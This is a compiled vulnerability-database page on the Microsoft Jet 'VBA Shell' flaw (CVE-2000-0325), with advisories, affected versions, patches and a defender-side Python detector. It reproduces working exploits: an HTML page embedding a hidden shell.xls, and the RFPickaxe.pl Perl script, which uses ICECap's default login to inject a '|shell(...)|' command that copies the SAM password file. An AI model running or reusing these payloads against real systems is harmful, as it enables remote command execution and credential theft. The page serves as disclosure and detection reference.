CVE-2000-0325
CVSS7.2
Published: 1999-08-20 00:00:00
Revised: 2008-09-10 15:04:05

[Original] The Microsoft Jet database engine allows an attacker to execute commands via a database query, aka the "VBA Shell" vulnerability.


[CNNVD] Microsoft JET VBA Shell Vulnerability (CNNVD-199908-038)

A vulnerability exists in the Microsoft Jet database engine. An attacker can execute commands via a database query; this is also known as the "VBA Shell" vulnerability.

- CVSS (base score)

CVSS score: 7.2 [HIGH]
Confidentiality impact: COMPLETE [complete information disclosure exposing all system files]
Integrity impact: COMPLETE [system integrity can be completely compromised]
Availability impact: COMPLETE [may cause a complete system outage]
Access complexity: LOW [no access restrictions on exploitation]
Access vector: LOCAL [exploitation requires physical access or a local account]
Authentication: NONE [no authentication required]

- CPE (affected platforms and products)

cpe:/a:microsoft:jet:3.5.1  Microsoft Jet 3.5.1
cpe:/a:microsoft:jet:3.5    Microsoft Jet 3.5

- OVAL (technical details for detection)

No matching OVAL definitions found

- Official database links

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2000-0325
(official data source) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2000-0325
(official data source) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-199908-038
(official data source) CNNVD

- Other links and resources

http://xforce.iss.net/static/3155.php
(UNKNOWN)  XF  jet-vba-shell(3155)
http://www.securityfocus.com/bid/548
(UNKNOWN)  BID  548
http://www.microsoft.com/technet/security/bulletin/ms99-030.asp
(UNKNOWN)  MS  MS99-030

- Vulnerability information

Microsoft JET VBA Shell Vulnerability
High severity  Input validation
1999-08-20 00:00:00 2005-10-20 00:00:00
Remote
A vulnerability exists in the Microsoft Jet database engine. An attacker can execute commands via a database query; this is also known as the "VBA Shell" vulnerability.

- Advisories and patches

Microsoft has made a patch available at the following URL:
http://officeupdate.microsoft.com/articles/mdac_typ.htm
This was made public in a Microsoft Security Advisory published on August 20, 1999. The patch works by creating a "sandbox mode" for Jet 3.5x, and changing the implementation of sandbox mode in Jet 4.0.
An additional patch made available by Microsoft exists at the following location:
http://office.microsoft.com/assistance/9798/mdac_typ.aspx
Also, Wanderley J. Abreu Jr. has written a program that will search the registry and modify the EditFlags value for DocObjects file types, setting the Confirm Open After Download value to 01. This means that these file types can no longer be silently downloaded and opened. It can be downloaded from:
http://www.securityfocus.com/data/vulnerabilities/patches/RegFix.zip

- Vulnerability information (19435)

Microsoft JET 3.5/3.51/4.0 VBA Shell Vulnerability (EDBID:19435)
windows remote
1999-07-29 Verified
0 BrootForce
N/A [Click to download]
source:http://www.securityfocus.com/bid/548/info

A vulnerability affects Microsoft's Jet 3.51 and 4.0 driver (MSJET35.DLL and MSJET40.DLL).

This vulnerability could allow an attacker to create malicious '.xls' or '.doc' files incorporating VBA shell commands. When the file is opened, the shell commands contained in the file will execute on the target system. Command execution will occur in the context of the user that is opening the file.

The file could be distributed via email, the web (including in hidden frames), or any number of methods. 

<HTML>
<HEAD>
   <META HTTP-EQUIV="Content-Type" CONTENT="text/html; charset=iso-8859-1">
   <META NAME="Author" CONTENT="yeahright">
   <META NAME="GENERATOR" CONTENT="edit.com">
   <TITLE>exshell jexploit</TITLE>
</HEAD>
<BODY TEXT="#330033" BGCOLOR="#FFFFFF" LINK="#0000EE" VLINK="#551A8B" ALINK="#FF0000">
<FONT COLOR="#993366"><FONT FACE="ElegaGarmnd BT"><FONT SIZE=+1>This
is a benign demonstration of the Jet 3.51 vulnerability documented by J.C.G.
Cuartango.</FONT></FONT></FONT>
<BR><FONT COLOR="#993366"><FONT FACE="ElegaGarmnd BT"><FONT SIZE=+1>This
vulnerability affects users of Office95/97 with Jet database engine versions
around 3.5 (tested 3.51.1029.00)</FONT></FONT></FONT>

<P><FONT COLOR="#993366"><FONT FACE="ElegaGarmnd BT"><FONT SIZE=+1>On the bottom of
this page is an invisible, embedded .xls file that will do a few things
if you double-click it:</FONT></FONT></FONT>
<BR><FONT COLOR="#993366"><FONT FACE="ElegaGarmnd BT"><FONT SIZE=+1>1.&nbsp;
Get a welcome note from ftp.aol.com and write it to your hd as c:\ftptest.txt</FONT></FONT></FONT>
<BR><FONT COLOR="#993366"><FONT FACE="ElegaGarmnd BT"><FONT SIZE=+1>2.&nbsp;
Write a log file of the ftp session to your hd as c:\jexploit.log</FONT></FONT></FONT>
<BR><FONT COLOR="#993366"><FONT FACE="ElegaGarmnd BT"><FONT SIZE=+1>3.&nbsp;
Open regedit.exe on your computer.</FONT></FONT></FONT>

<P><FONT COLOR="#993366"><FONT FACE="ElegaGarmnd BT"><FONT SIZE=+1>There
are no macros, so there are no macro warnings.&nbsp; There are currently
(8/3/99) no AV products to stop this.</FONT></FONT></FONT>
<BR><FONT COLOR="#993366"><FONT FACE="ElegaGarmnd BT"><FONT SIZE=+1>This
could be changed slightly to format your hd without prompts or perform
several other devastating functions.</FONT></FONT></FONT>

<P><FONT COLOR="#993366"><FONT FACE="ElegaGarmnd BT"><FONT SIZE=+1>The
purpose of this demonstration is as follows:</FONT></FONT></FONT>
<BR><FONT COLOR="#993366"><FONT FACE="ElegaGarmnd BT"><FONT SIZE=+1>1.&nbsp;
To have some innocent fun.</FONT></FONT></FONT>
<BR><FONT COLOR="#993366"><FONT FACE="ElegaGarmnd BT"><FONT SIZE=+1>2.&nbsp;
To demonstrate how to have fun.</FONT></FONT></FONT>
<BR><FONT COLOR="#993366"><FONT FACE="ElegaGarmnd BT"><FONT SIZE=+1>3.&nbsp;
To show the vulnerabilities in yet another M$ product.</FONT></FONT></FONT>
<BR><FONT COLOR="#993366"><FONT FACE="ElegaGarmnd BT"><FONT SIZE=+1>4.&nbsp;
To alert the AV people that they need to work on this problem.</FONT></FONT></FONT>

<P><FONT COLOR="#993366"><FONT FACE="ElegaGarmnd BT"><FONT SIZE=+1>If you use IE
or see a broken link next to the arrow just click <A HREF="shell.xls"> here.</A>
&nbsp;&nbsp;Probably your browser can't view embedded xls.</FONT></FONT>
<BR><FONT COLOR="#993366"><FONT FACE="ElegaGarmnd BT"><FONT SIZE=+1>
The malicious potential of this exploit is great.</FONT></FONT></FONT>

<P><FONT COLOR="#993366"><FONT FACE="ElegaGarmnd BT"><FONT SIZE=+1> 
Have a nice day!!!&nbsp;&nbsp;&nbsp;-ßrootFôrce</FONT></FONT></FONT>
<p>&nbsp;<p>

<BODY TEXT="#330033" BGCOLOR="#FFFFFF" LINK="#0000EE" VLINK="#551A8B" ALINK="#FF0000">
<FONT COLOR="#993366"><FONT FACE="Felix Titling"><FONT SIZE=+1>this
is a test of the emergency broadcast system.</FONT></FONT></FONT>

<P><FONT FACE="Felix Titling"><FONT COLOR="#993366"><FONT SIZE=+1>click
this here thingy to test==></FONT></FONT></FONT>&nbsp;
<EMBED src="shell.xls"  width=50 height=50></EMBED>
</BODY>
</HTML>


- Vulnerability information (F21847)

RFP2K04.txt (PacketStormID:F21847)
2000-05-17 00:00:00
rain forest puppy  wiretrip.net
exploit,shell
CVE-2000-0325
[Click to download]

RFP2K04 - Mining BlackICE with RFPickAxe. BlackICE IDS uses a management console called ICECap to collect and monitor alerts sent by the various installed BlackICE agents. The ICECap user console sits on port 8081 and has the default login of 'iceman' with no password. The second problem is that the software uses, by default, the Microsoft Jet 3.5 engine to store alerts. If you couple that with the shell VBA problem, that means you can push alerts that contain commands to be executed on the ICECap system. Includes RFPickaxe.pl demo exploit.

---/ RFP2K04 /----------------------------/ rfp.labs / wiretrip /---------

                     Mining BlackICE with RFPickAxe
          Remote command execution on BlackICE ICECap stations 
                                  
------------------------------------/ rain forest puppy / rfp@wiretrip.net

Table of contents:

-/ 1 / For the Black Hats
-/ 2 / For the White Hats
-/ 3 / Forward thinking
-/ 4 / You know you love perl.  Admit it.



--/ 1 / For the Black Hats /----------------------------------------------

BlackICE IDS uses a management console called ICECap to collect and
monitor alerts sent by the various installed BlackICE agents.  The ICECap
user console sits on port 8081 (included HTTP server), and alerts are
pushed to another server listening on port 8082.

The first problem is that the software uses a default login of 'iceman',
with no password.  This means we can log onto the console on port 8081, or
push it alerts on port 8082.  What could be more fun than a few false
alerts?

The second problem is that the software uses, by default, the Microsoft
Jet 3.5 engine to store alerts.  If you couple that with the shell VBA
problem (CVE: CAN-2000-0325), that means you can push alerts that contain
commands to be executed on the ICECap system.



--/ 2 / For the White Hats /----------------------------------------------

NetworkICE has released ICEcap v2.0.23a, as well as some supporting KB
articles detailing the problem.

ICEcap 2.0.23a
http://advice.networkice.com/advice/Support/KB/q000167/

Jet bug
http://advice.networkice.com/advice/Support/KB/q000164/

Easy injection bug
http://advice.networkice.com/advice/Support/KB/q000166/

The Common Vulnerabilities and Exposures (CVE) project has assigned the
name CAN-2000-0350 to this issue. This is a candidate for inclusion in the
CVE list (http://cve.mitre.org), which standardizes names for security
problems.



--/ 3 / Forward thinking /------------------------------------------------

I discussed this point at CanSecWest.  BlackICE is not the only (security)
application that stores data in a Microsoft .mdb file.  So what does use
.mdb's?  Well, NT 4.0 WINS, DHCP, CyberCop, NFR-GUI (Windows client), etc.

I leave as an exercise to the reader to look into it.  I'd appreciate
anyone doing research into these matters to drop me a note on their
final findings.



--/ 4 / You know you love perl.  Admit it. /-----------------------------

#!/usr/bin/perl
#
# RFPickaxe.pl - demo exploit for default ICECap login/alerts
# Disclaimer: I do not provide technical support for my exploits!
#
# Sorry, this requires Unix, due to the `date` call

$|=1;
use Socket;

###############################################################

# IP of ICECap system (assumes port 8082)

$Target="10.10.200.4";

# account info - uses default 'iceman' w/ no password

$account="iceman";
$httpauth="aWNlbWFuOiUzQjclQzYlRkU=";

#-------- attributes of the alert ----------

$id="100005";
$issue_name="Exploit";
$sev="1";

# spoof these

$target="0.0.0.8";
$target_dns="some.host.com";
$det_ip="0.0.0.8";
$det_nbn="SENSOR";
$int_ip="255.255.255.255";
$param="Pickaxe";

# either fake the MAC, or use it to run commands via JET vulnerability

#$det_mac="0000000000000"; 
$det_mac="|shell(\"cmd /c copy c:\\winnt\\repair\\sam._ ".
	"c:\\progra~1\\networ~1\\icecap\\spatch\\en\\sam.exe \")|";

##############################################################


$inet=inet_aton($Target);

$time=`date -u "+%Y-%m-%d %T"`;
$time=~s/ /%20/g;
$time=~s/:/%3a/g;

#path is \program files\network ice\icecap\spatch\en

$alert="accountName=$account&issueID=$id&issueName=$issue_name".
	"&severity=$sev&targetNetAddress=$target&targetDNSName=".
	"$target_dns&detectorNetAddress=$det_ip&detectorNetBIOS".
	"Name=$det_nbn&detectorMacAddress=$det_mac&".
	"intruderNetAddress=$int_ip&detectorType=3&startTime=".
	"$time&parameter=$param\r\n";

$len=length($alert);

@DXX=();
$send=<<EOT
POST / HTTP/1.0
User-Agent: netice-alerter/1.0
Host: $Target:8082
Authorization: Basic $httpauth
Content-Type: application/x-www-form-urlencoded
Content-Length: $len

EOT
;

$send=~s/\n/\r\n/g;
$send=$send.$alert;

sendraw("$send");

print @DXX;

exit;

sub sendraw { 	# raw network functions stay in here
	my ($pstr)=@_;
	$PROTO=getprotobyname('tcp')||0;

	# AF_INET=2 SOCK_STREAM=1
	eval {
	alarm(30);
	if(!(socket(S,2,1,$PROTO))){ die("socket");}
	if(connect(S,pack "SnA4x8",2,8082,$inet)){
		# multi-column perl coding...don't do as I do ;)
		select(S); 	$|=1;
		print $pstr; 	
		@DXX=<S>; 
		select(STDOUT); close(S); 
		alarm(0); 	return;
	} else { die("not responding"); }
	alarm(0);};
 	if ($@) { if ($@ =~ /timeout/){ die("Timed out!\n");}}}	




----/ acks /--------------------------------------------------------------

      NetworkICE + eEye, Attrition, w00w00, ADM, Technotronic, USSR

------------------------------------/ rain forest puppy / rfp@wiretrip.net

       If anyone wants to donate a skin to my website, contact me.

---/ RFP2K04 /----------------------------/ rfp.labs / wiretrip /---------
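A defender-side check for the alert push described in sections 1 and 4 of RFP2K04 above: it parses an ICECap-style alert POST to port 8082, flags use of the default 'iceman' account, and flags Jet pipe-delimited expressions such as `|shell(...)|` in any form field. This is an added example, not rfp's code or NetworkICE's; the sample request, the host 10.0.0.1 and the function names are my own constructions.

```python
import base64
import re
from urllib.parse import parse_qs

# Jet 3.5 evaluates text enclosed in '|' characters as a VBA expression, so a
# field such as detectorMacAddress=|shell("...")| pushed into the ICECap alert
# database becomes command execution on the console host.  PIPE_EXPR flags it.
PIPE_EXPR = re.compile(r'\|[^|]*\b(shell|createobject|environ|kill)\s*\(', re.I)
DEFAULT_ACCOUNT = "iceman"   # default ICECap login named in the advisory

def parse_alert(raw):
    """Split a raw HTTP POST into (request line, headers dict, body)."""
    head, _, body = raw.partition("\r\n\r\n")
    lines = head.split("\r\n")
    headers = {}
    for line in lines[1:]:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return lines[0], headers, body

def basic_auth_user(headers):
    """Return the user name from an HTTP Basic Authorization header, or None."""
    auth = headers.get("authorization", "")
    if not auth.lower().startswith("basic "):
        return None
    try:
        decoded = base64.b64decode(auth[6:], validate=True).decode("latin-1")
    except ValueError:   # malformed base64 (binascii.Error is a ValueError)
        return None
    return decoded.split(":", 1)[0]

def inspect_alert(raw):
    """Return findings for one alert POST; an empty list means nothing flagged."""
    findings = []
    _, headers, body = parse_alert(raw)
    if basic_auth_user(headers) == DEFAULT_ACCOUNT:
        findings.append("alert pushed with the default 'iceman' account")
    for field, values in parse_qs(body, keep_blank_values=True).items():
        for value in values:
            if PIPE_EXPR.search(value):
                findings.append(f"Jet pipe expression in field '{field}': {value}")
    return findings

# Constructed sample alert push (not captured traffic): default account + pipe expression.
SAMPLE_ALERT = (
    "POST / HTTP/1.0\r\nHost: 10.0.0.1:8082\r\n"
    "Authorization: Basic aWNlbWFuOg==\r\n"   # base64 of "iceman:"
    "Content-Type: application/x-www-form-urlencoded\r\n\r\n"
    "accountName=iceman&issueID=100005&severity=1&detectorMacAddress=|shell(\"cmd /c echo demo\")|\r\n"
)
```

Running `inspect_alert(SAMPLE_ALERT)` yields two findings; the same logic can be run over a proxy or packet-capture export of traffic to the alert collector.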



- Vulnerability information

59322
Microsoft Jet Database Crafted Query Arbitrary Command Execution
Remote / Network Access Input Manipulation
Loss of Integrity Patch / RCS
Exploit Unknown Vendor Verified

- Vulnerability description

Jet Database contains a flaw that may allow an attacker to execute arbitrary commands. The issue is triggered when a malicious user submits a specially crafted database query.

- Timeline

1999-08-20 Unknown
Unknown 1999-08-20

- Solution

Currently, there are no known workarounds or upgrades to correct this issue. However, Microsoft Corporation has released a patch to address this vulnerability.

- References

- Discoverer

- Vulnerability information

Microsoft JET VBA Shell Vulnerability
Input Validation Error 548
Yes No
1999-07-29 12:00:00 2009-07-11 12:56:00
This vulnerability was discovered and posted to NTBugtraq by Juan Carlos Garcia Cuartango <cuartangojc@MX3.REDESTB.ES>.

- Affected versions

Microsoft JET 4.0
+ Microsoft Access 2000
Microsoft JET 3.51
+ Microsoft Excel 95
+ Microsoft Excel 97
Microsoft JET 3.5
+ Microsoft Access 95
+ Microsoft Access 97
Microsoft JET 4.0 SP1
Microsoft JET 3.51 SP3

- Not affected versions

Microsoft JET 4.0 SP1
Microsoft JET 3.51 SP3

- Discussion

A vulnerability affects Microsoft's Jet 3.51 and 4.0 driver (MSJET35.DLL and MSJET40.DLL).

This vulnerability could allow an attacker to create malicious '.xls' or '.doc' files incorporating VBA shell commands. When the file is opened, the shell commands contained in the file will execute on the target system. Command execution will occur in the context of the user that is opening the file.

The file could be distributed via email, the web (including in hidden frames), or any number of methods.

- Exploit

This exploit by BrootForce <brootforce@emailsecurity.com> is a modified version of Juan Cuartango's original demonstration exploit.

- Solution

Microsoft has made a patch available at the following URL:
http://officeupdate.microsoft.com/articles/mdac_typ.htm
This was made public in a Microsoft Security Advisory published on August 20, 1999. The patch works by creating a "sandbox mode" for Jet 3.5x, and changing the implementation of sandbox mode in Jet 4.0.

An additional patch made available by Microsoft exists at the following location:
http://office.microsoft.com/assistance/9798/mdac_typ.aspx

Also, Wanderley J. Abreu Jr. <storm@UNIKEY.COM.BR> has written a program that will search the registry and modify the EditFlags value for DocObjects file types, setting the Confirm Open After Download value to 01. This means that these file types can no longer be silently downloaded and opened. It can be downloaded from:
http://www.securityfocus.com/data/vulnerabilities/patches/RegFix.zip

- References
